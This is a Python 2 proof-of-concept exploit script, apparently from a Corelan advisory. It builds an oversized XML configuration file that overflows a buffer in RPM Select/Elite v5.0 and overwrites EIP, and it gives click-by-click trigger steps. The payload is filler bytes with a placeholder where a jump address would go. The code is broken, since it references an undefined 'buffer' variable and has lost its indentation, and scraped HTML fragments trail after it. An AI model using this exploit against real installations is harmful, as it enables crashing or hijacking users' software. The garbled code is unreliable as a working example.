#!/usr/bin/python
# ####################################################################
# RPM Select/Elite v5.0 (.xml config parsing) unicode buffer overflow PoC
# Found by: mr_me - http://net-ninja.net/
# Homepage: http://lpd.brooksnet.com/
# Download: http://www.brooksnet.com/download-rpmselect
# Tested on: Windows XP SP3
# Advisory: http://www.corelan.be:8800/advisories.php?id=10-024
# Greetz: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# ####################################################################
# Notes: We overwrite EIP @ 32 bytes in, and the function doesnt copy
# enough of our string to hit SEH. However modules are compiled with
# SAFESEH anyway. Combine that with unicode and the printable ascii
# limitations, we are presented with to much of a hurdle.
# ####################################################################
# How to trigger the crash:
# file -> import configuration
# Click on the queue name, then click on the imported transform
# Click 'modify transform' and b00m!
# ####################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages.
header1 = """
lol
0
1
1
0
0
mr_mes print queue
0
48
0
"""
header2 = """
0
0
0
0
0
6.000000
24
0.500000
90
10.000000
80
0.500000
60
2
0
400
12
0
0.500000
portrait
1252
false
1
0.500000
1
0
1
0
0
1
-16
"""
payload = "\x41" * 32
payload += "\x42\x42" # your "jmp to esp" instruction should go here
payload += "\x44" * (5000-len(buffer))
exploit = header1.rstrip() + payload.rstrip() + header2.rstrip()
try:
f=open("cst-rpm-config.xml",'w')
f.write(exploit)
f.close()
print "[+] File created successfully !"
except:
print "[-] Error cannot write xml file to system\n"
|
|
|
|
<![CDATA[<p id="vvttv"></p>]]>
|
|
<![CDATA[<p id="vvttv"></p>]]> |
<![CDATA[<p id="vvttv"></p>]]>
<![CDATA[<pre id="vvttv"><cite id="vvttv"><progress id="vvttv"></progress></cite></pre>]]>
|
<![CDATA[<output id="vvttv"><dfn id="vvttv"><th id="vvttv"></th></dfn></output>]]>
<![CDATA[<p id="vvttv"></p>]]> |